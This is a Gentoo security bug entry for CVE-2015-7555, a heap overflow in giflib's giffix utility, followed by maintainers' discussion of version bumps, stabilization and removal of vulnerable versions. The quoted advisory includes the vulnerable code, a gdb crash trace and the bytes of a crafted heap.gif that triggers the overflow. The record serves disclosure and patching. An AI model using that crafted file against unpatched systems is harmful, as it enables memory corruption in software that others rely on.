Bug 569652 (CVE-2015-7555)

Summary:	<media-libs/giflib-5.1.4: heap overflow in giffix
Product:	Gentoo Security	Reporter:	Agostino Sarubbo <ago>
Component:	Vulnerabilities	Assignee:	Gentoo Security <security>
Status:	RESOLVED FIXED
Severity:	major	CC:	blueknight, graphics+disabled, polynomial-c
Priority:	Normal	Flags:	kensington: sanity-check+
Version:	unspecified
Hardware:	All
OS:	Linux
URL:	http://www.openwall.com/lists/oss-security/2015/12/21/4
Whiteboard:	B3 [noglsa cve]
Package list:	media-libs/giflib-5.1.4	Runtime testing required:	---
Bug Depends on:	451324
Bug Blocks:

Description Agostino Sarubbo gentoo-dev

2015-12-24 19:03:55 UTC

From ${URL} :

giflib[1] is a library for working with GIF images.  It also provides
several command-line utilities.


CVE-2015-7555
=============

A heap overflow may occur in the giffix utility included in giflib-5.1.1
when processing records of the type `IMAGE_DESC_RECORD_TYPE' due to the
allocated size of `LineBuffer' equaling the value of the logical screen
width, `GifFileIn->SWidth', while subsequently having
`GifFileIn->Image.Width' bytes of data written to it.


giflib-5.1.1/util/giffix.c #35..194:
,----
| int main(int argc, char **argv)
| {
|     [...]
|     if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
|         GIF_EXIT("Failed to allocate memory required, aborted.");
| 
|     /* Scan the content of the GIF file and load the image(s) in: */
|     do {
|         [...]
|         switch (RecordType) {
|             case IMAGE_DESC_RECORD_TYPE:
|                 if (DGifGetImageDesc(GifFileIn) == GIF_ERROR)
|                     QuitGifError(GifFileIn, GifFileOut);
|                 [...]
|                 Width = GifFileIn->Image.Width;
|                 Height = GifFileIn->Image.Height;
|                 [...]
|                 /* Find the darkest color in color map to use as a filler. */
|                 ColorMap = (GifFileIn->Image.ColorMap ? GifFileIn->Image.ColorMap :
|                                                      GifFileIn->SColorMap);
|                 for (i = 0; i < ColorMap->ColorCount; i++) {
|                     j = ((int) ColorMap->Colors[i].Red) * 30 +
|                         ((int) ColorMap->Colors[i].Green) * 59 +
|                         ((int) ColorMap->Colors[i].Blue) * 11;
|                     if (j < ColorIntens) {
|                         ColorIntens = j;
|                         DarkestColor = i;
|                     }
|                 }
| 
|                 /* Load the image, and dump it. */
|                 for (i = 0; i < Height; i++) {
|                     GifQprintf("\b\b\b\b%-4d", i);
|                     if (DGifGetLine(GifFileIn, LineBuffer, Width)
|                         == GIF_ERROR) break;
|                     if (EGifPutLine(GifFileOut, LineBuffer, Width)
|                         == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
|                 }
| 
|                 if (i < Height) {
|                     [...]
|                     /* Fill in with the darkest color in color map. */
|                     for (j = 0; j < Width; j++)
|                         LineBuffer[j] = DarkestColor;
|                     for (; i < Height; i++)
|                         if (EGifPutLine(GifFileOut, LineBuffer, Width)
|                             == GIF_ERROR) QuitGifError(GifFileIn, GifFileOut);
|                 }
|                 break;
|             [...]
|         }
|     }
|     while (RecordType != TERMINATE_RECORD_TYPE);
|     [...]
| }
`----

,----
| $ gdb -q --args ./giffix heap.gif
| Reading symbols from ./giffix...done.
| (gdb) b util/giffix.c:94
| Breakpoint 1 at 0x401131: file giffix.c, line 94.
| (gdb) b util/giffix.c:148
| Breakpoint 2 at 0x401449: file giffix.c, line 148.
| (gdb) b util/giffix.c:149
| Breakpoint 3 at 0x401452: file giffix.c, line 149.
| 
| (gdb) commands 3
| Type commands for breakpoint(s) 3, one per line.
| End with a line saying just "end".
| >printf "%p, 0x%02x\n", LineBuffer+j, DarkestColor
| >c
| >end
| 
| (gdb) r
| [...]
| Breakpoint 1, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:94
| 94      if ((LineBuffer = (GifRowType) malloc(GifFileIn->SWidth)) == NULL)
| 
| (gdb) p GifFileIn->SWidth
| $1 = 1
| 
| (gdb) c
| [...]
| Breakpoint 2, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:148
| 148             for (j = 0; j < Width; j++)
| 
| (gdb) p Width
| $2 = 255
| 
| (gdb) c
| Continuing.
| 
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149             LineBuffer[j] = DarkestColor;
| 0x618920, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149             LineBuffer[j] = DarkestColor;
| 0x618940, 0x01
| 
| [...]
| 
| Breakpoint 3, main (argc=2, argv=0x7fffffffe6b8) at giffix.c:149
| 149             LineBuffer[j] = DarkestColor;
| 0x618a1e, 0x01
| 
| Program received signal SIGSEGV, Segmentation fault.
| 0x00007ffff7bd8658 in GifFreeMapObject (Object=0x101010101010101) at gifalloc.c:80
| 80          (void)free(Object->Colors);
`----


heap.gif:
,----
| unsigned char heap[] = {
|     /* GIF87a */
|     0x47, 0x49, 0x46, 0x38, 0x37, 0x61,
| 
|     /* DGifGetScreenDesc() */
|     0x01, 0x00,         /* GifFile->SWidth */
|     0x01, 0x00,         /* GifFile->SHeight */
|     0x80,               /* ColorCount = 1 << ((this & 0x07) + 1) */
|     0x00,               /* GifFile->SBackGroundColor */
|     0x00,               /* GifFile->AspectByte */
|     0x11, 0x11, 0x11,   /* GifFile->SColorMap->Colors[0] */
|     0x00, 0x00, 0x00,   /* GifFile->SColorMap->Colors[1] */
| 
|     /* DGifGetRecordType() */
|     0x2c,               /* DESCRIPTOR_INTRODUCER */
| 
|     /* DGifGetImageDesc() */
|     0x00, 0x00,         /* GifFile->Image.Left */
|     0x00, 0x00,         /* GifFile->Image.Top */
|     0xff, 0x00,         /* GifFile->Image.Width */
|     0x01, 0x00,         /* GifFile->Image.Height */
|     0x00,               /* BitsPerPixel = (this & 0x07) + 1 */
| 
|     /* DGifSetupDecompress() */
|     0x00,               /* CodeSize */
| 
|     /* end of image data */
|     0x00,
| 
|     /* end of gif */
|     0x3b
| };
`----


Solution
========

No fix exists as of yet.



@maintainer(s): after the bump, in case we need to stabilize the package, please let us know if it is ready for the stabilization or not.

Comment 1 SpanKY gentoo-dev

2015-12-24 20:05:49 UTC

we'll do the bump when it's out, but we've had giflib-5.x masked forever, so no need for security to track in general

Comment 2 Yury German Gentoo Infrastructure

2015-12-24 21:40:48 UTC

Agreed - Assigning to Graphics Team.

Comment 3 Agostino Sarubbo gentoo-dev

2015-12-24 22:45:50 UTC

(In reply to Yury German from comment #2)
> Agreed - Assigning to Graphics Team.

Sorry but I don't understand at all this move. Giflib 4 is affected, why change assignee?

Comment 4 Yury German Gentoo Infrastructure

2015-12-24 22:54:28 UTC

> A heap overflow may occur in the giffix utility included in giflib-5.1.1

media-libs/giflib - giflib-5.x is masked at this time. I do not see where there is relation to Giflib 4 in the information provided, and the maintainers agree to patch the masked version.

Comment 5 SpanKY gentoo-dev

2015-12-25 03:47:52 UTC

i just went w/the info in the report, but it would appear it's incorrect.
i checked giflib 4.1.6 and 4.2.3 and the same issue exists there.

Comment 6 Lars Wendler (Polynomial-C) (RETIRED) gentoo-dev

2016-01-11 13:38:29 UTC

commit c3f863848890885a99c4323383b0364ef66300aa
Author: Lars Wendler <polynomial-c@gentoo.org>
Date:   Fri Jan 8 10:53:31 2016

    media-libs/giflib: Bump to version 5.1.2

    Unleash to ~arch.

    Package-Manager: portage-2.2.26
    Signed-off-by: Lars Wendler <polynomial-c@gentoo.org>


From the NEWS file:

* Fix SourceForge bug #71: Buffer overwrite when giffixing a malformed gif.

Comment 7 Yury German Gentoo Infrastructure

2016-02-14 18:26:46 UTC

30 Days have passed do we want to go stable 5.1.2?

Comment 8 Yury German Gentoo Infrastructure

2016-02-25 06:40:33 UTC

5.1.2 in tree but in ~arch. No updates to 4.1.X.

Maintainers, please advise what you would like to do. This has been around since December, 2015.

Comment 9 Yury German Gentoo Infrastructure

2016-04-26 05:50:19 UTC

Ping - Does 4.1.6-r3 contain this fix?

Comment 10 Yury German Gentoo Infrastructure

2016-06-06 18:09:13 UTC

Maintainers:

1. giflib-5.1.X - Non Stable

2. as per Vapier 4.1X is Vulnerable.

Please decide what you would like to do with this package:
1. Make 5.1.X stable and drop 4.1.X
2. Patch 4.1.X 

This vulnerability has been around since December of 2015, and is a B2 (Major vulnerability).

Comment 11 SpanKY gentoo-dev

2016-06-07 04:58:40 UTC

i'm not sure giflib-5 is ready for stable yet -- see bug 451324 for details

even then, we'll prob want to keep around giflib-4 for its older SONAME for binary compat.  that SONAME has been around for a long time.

Comment 12 Yury German Gentoo Infrastructure

2016-09-07 07:06:38 UTC

(In reply to SpanKY from comment #11)
> i'm not sure giflib-5 is ready for stable yet -- see bug 451324 for details
> 
> even then, we'll prob want to keep around giflib-4 for its older SONAME for
> binary compat.  that SONAME has been around for a long time.

I Guess we need to make a decision if 4.1.X gets a patch? It has been a few months.

Comment 13 Thomas Deutschmann (RETIRED) gentoo-dev

2016-11-18 19:14:02 UTC

Stabilization of =media-libs/giflib-5.1.4 has begun as part of bug 597250.

@ Arches,

please test and mark stable: =media-libs/giflib-5.1.4

Stable target(s): alpha amd64 arm arm64 hppa ia64 ppc ppc64 sparc x86

Comment 14 Kristian Fiskerstrand (RETIRED) gentoo-dev

2016-11-18 20:28:06 UTC

First fixed version in tree was 5.1.2, hence this is correct summary line

Comment 15 Agostino Sarubbo gentoo-dev

2016-11-19 09:15:10 UTC

(In reply to Kristian Fiskerstrand from comment #14)
> First fixed version in tree was 5.1.2, hence this is correct summary line

Since I manage the security bugs, we always have used the first stable version in the tree with fix the issues. 5.1.2 in this case is not a stable version and actually is not anymore in the tree.

Comment 16 Agostino Sarubbo gentoo-dev

2016-11-19 13:53:46 UTC

amd64 stable

Comment 17 Agostino Sarubbo gentoo-dev

2016-11-19 13:56:06 UTC

x86 stable

Comment 18 Aaron Bauman (RETIRED) gentoo-dev

2016-11-21 23:02:38 UTC

There is a reason why we do things a certain way.  The summary is a reference for GLSA's and a historical piece of what is/is not fixed.  If you intend to call for 5.1.4 as stable then do so as usual.  This is not a problem. We do it all the time without hassle.

What is a problem, is changing the bug summary simply because you do not understand or agree with the workflow we have.  I will not go into all possible scenarios, but there are environments where individuals do not sync their tree as often as you or I may so they may have 5.1.2 still.  For those up to date 5.1.2 is gone, but 5.1.3 is still in the tree you are now indicating that 5.1.3 is vulnerable as well.  It is *not* vulnerable though.  

If you don't like the workflow or have a better one then propose it, please.

Also, it is understand that 'tatt' and the like will pull the package atom from the comments.  Is this not true?

Comment 19 Tobias Klausmann (RETIRED) gentoo-dev

2016-11-23 09:19:35 UTC

5.1.4 already stable on alpha due to bug 597250

Comment 20 Markus Meier gentoo-dev

2016-11-29 17:35:39 UTC

arm stable

Comment 21 Jeroen Roovers (RETIRED) gentoo-dev

2017-01-09 14:19:40 UTC

Stable for HPPA.

Comment 22 Jeroen Roovers (RETIRED) gentoo-dev

2017-01-09 14:20:30 UTC

commit a2c9820119ac33ce2db25281ebf548da83164fd0
Author: Agostino Sarubbo <ago@gentoo.org>
Date:   Tue Jan 3 11:29:30 2017 +0100

    media-libs/giflib: ppc64 stable wrt bug #597250

    Package-Manager: portage-2.3.0
    RepoMan-Options: --include-arches="ppc64"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>

commit 318b9a5fca4adecc2eaf397f3e3bda23defb0985
Author: Agostino Sarubbo <ago@gentoo.org>
Date:   Sun Jan 1 13:31:07 2017 +0100

    media-libs/giflib: ppc stable wrt bug #597250

    Package-Manager: portage-2.3.0
    RepoMan-Options: --include-arches="ppc"
    Signed-off-by: Agostino Sarubbo <ago@gentoo.org>

Comment 23 Agostino Sarubbo gentoo-dev

2017-03-04 14:02:21 UTC

sparc stable

Comment 24 Agostino Sarubbo gentoo-dev

2017-03-11 17:08:12 UTC

ia64 stable.

Maintainer(s), please cleanup.
Security, please add it to the existing request, or file a new one.

Comment 25 Yury German Gentoo Infrastructure

2017-04-19 05:22:49 UTC

Arches, Thank you for your work.
New GLSA Request filed.

Maintainer(s), please drop the vulnerable version(s).

Comment 26 Yury German Gentoo Infrastructure

2017-05-25 06:23:56 UTC

Maintainer(s), please drop the vulnerable version(s).

Comment 27 Thomas Deutschmann (RETIRED) gentoo-dev

2017-06-03 18:21:11 UTC

Dropping "cleanup" from whiteboard to reflect that we are still waiting for a patched 4.2.x ebuild.


GLSA Vote: No!

It only affects the giffix utility...



@ Maintainer(s): Please cleanup and drop 

=media-libs/giflib-5.1.3

Also, please backport the fix (https://sourceforge.net/p/giflib/code/ci/179510be300bf11115e37528d79619b53c884a63) to 4.2.3-r1 which is also affected.

Comment 28 Yury German Gentoo Infrastructure

2017-06-11 00:05:03 UTC

> Also, please backport the fix
> (https://sourceforge.net/p/giflib/code/ci/
> 179510be300bf11115e37528d79619b53c884a63) to 4.2.3-r1 which is also affected.

adding to above: Or please feel free to drop it if you want to go that route since it is not slotted.

Comment 29 Aaron Bauman (RETIRED) gentoo-dev

2018-01-21 01:06:05 UTC

Both vulnerable versions dropped.

Tree is clean.

https://gitweb.gentoo.org/repo/gentoo.git/commit/?id=1f92ad9194c108dd79f6b4eeb37cb4c3abbb0d3d